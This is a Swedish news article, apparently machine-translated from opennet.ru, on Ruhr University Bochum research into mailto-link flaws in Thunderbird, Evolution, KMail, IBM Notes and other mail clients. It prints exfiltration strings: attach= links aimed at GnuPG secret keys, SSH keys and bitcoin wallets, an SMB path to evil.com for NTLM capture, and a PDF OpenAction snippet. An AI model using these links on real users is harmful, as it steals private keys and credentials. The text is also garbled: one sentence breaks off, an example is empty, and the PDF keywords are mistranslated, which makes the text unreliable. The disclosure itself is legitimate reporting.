Forskare från Ruhr University Bochum (Tyskland)
Länkar «
Mailklienter Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) och Pegasus Mail var sårbara för en trivial attack som låter dig bifoga automatiskt någon lokal fil, specificerad via en länk som "mailto:?attach=path_to_file". Filen bifogas utan att visa en varning, så utan särskild uppmärksamhet kanske användaren inte märker att brevet kommer att skickas med en bilaga.
Använd till exempel en länk som "mailto:[e-postskyddad]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" kan du infoga privata nycklar från GnuPG i brevet. Du kan också skicka innehållet i kryptoplånböcker (~/.bitcoin/wallet.dat), SSH-nycklar (~/.ssh/id_rsa) och alla filer som är tillgängliga för användaren. Dessutom låter Thunderbird dig bifoga grupper av filer genom att använda konstruktioner som "attach=/tmp/*.txt".
Förutom lokala filer bearbetar vissa e-postklienter länkar till nätverkslagring och sökvägar i IMAP-servern. IBM Notes låter dig framför allt överföra en fil från en nätverkskatalog när du bearbetar länkar som "attach=\\evil.com\dummyfile", samt avlyssna NTLM-autentiseringsparametrar genom att skicka en länk till en SMB-server som kontrolleras av angriparen (förfrågan kommer att skickas med den aktuella användaren för autentiseringsparametrar).
Thunderbird bearbetar framgångsrikt förfrågningar som "attach=imap:///fetch>UID>/INBOX>1/", som låter dig bifoga innehåll från mappar på IMAP-servern. Samtidigt dekrypteras meddelanden som hämtas från IMAP, krypterade via OpenPGP och S/MIME, automatiskt av e-postklienten innan de skickas. Utvecklarna av Thunderbird var
Gamla versioner av Thunderbird var också sårbara för två andra attackvarianter på PGP och S/MIME föreslagna av forskarna. Speciellt Thunderbird, såväl som OutLook, PostBox, eM Client, MailMate och R2Mail2, var föremål för en nyckelersättningsattack, orsakad av det faktum att e-postklienten automatiskt importerar och installerar nya certifikat som överförs i S/MIME-meddelanden, vilket möjliggör angriparen att organisera ersättning av publika nycklar som redan lagrats av användaren.
Den andra attacken, som Thunderbird, PostBox och MailMate är mottagliga för, manipulerar funktionerna i mekanismen för att automatiskt spara utkastmeddelanden och tillåter, med hjälp av mailto-parametrar, att initiera dekrypteringen av krypterade meddelanden eller tillägget av en digital signatur för godtyckliga meddelanden, med efterföljande överföring av resultatet till angriparens IMAP-server. I denna attack sänds chiffertexten via parametern "body" och taggen "meta refresh" används för att initiera ett anrop till angriparens IMAP-server. Till exempel: ' '
För att automatiskt bearbeta "mailto:"-länkar utan användarinteraktion kan specialdesignade PDF-dokument användas - OpenAction-åtgärden i PDF låter dig automatiskt starta mailto-hanteraren när du öppnar ett dokument:
%PDF-1.5
1 0 obj
<< /Typ /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Typ /Action /S /URI/URI (mailto:?body=——BEGIN PGP MEDDELANDE——[…])>>
endobj
Källa: opennet.ru